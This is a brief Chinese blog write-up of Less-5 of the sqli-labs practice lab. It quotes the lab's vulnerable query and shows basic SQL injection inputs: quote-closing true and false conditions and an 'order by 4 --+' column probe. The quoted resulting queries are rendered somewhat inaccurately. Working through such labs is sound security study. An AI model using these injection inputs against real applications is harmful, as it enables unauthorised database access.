sqli_labs_master(LESS-5)

LESS—5

查看源代码得到

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

采用的是 ' ' 闭合,若直接使用/?id=1 and 1=1,则在sql语句中是

$sql="SELECT * FROM users WHERE id='id=1 and 1=1' LIMIT 0,1";明显是错误的

所以要/?id=1' and '1'='1这样写,写进去是这样的

$sql="SELECT * FROM users WHERE id='id=1' and '1'='1' LIMIT 0,1";

再报个错

 

 $sql="SELECT * FROM users WHERE id='id=1' and '1'='2' LIMIT 0,1";

再查询一下字段

 $sql="SELECT * FROM users WHERE id='id=1' order by 4 --+ LIMIT 0,1";

 


__EOF__

本文作者执小汐
本文链接https://www.cnblogs.com/Zx0906/p/17437923.html
关于博主:评论和私信会在第一时间回复。或者直接私信我。
版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
声援博主:如果您觉得文章对您有帮助,可以点击文章右下角推荐一下。您的鼓励是博主的最大动力!
posted @   执小汐  阅读(16)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· Manus重磅发布:全球首款通用AI代理技术深度解析与实战指南
· 被坑几百块钱后,我竟然真的恢复了删除的微信聊天记录!
· 没有Manus邀请码?试试免邀请码的MGX或者开源的OpenManus吧
· 园子的第一款AI主题卫衣上架——"HELLO! HOW CAN I ASSIST YOU TODAY
· 【自荐】一款简洁、开源的在线白板工具 Drawnix
点击右上角即可分享
微信分享提示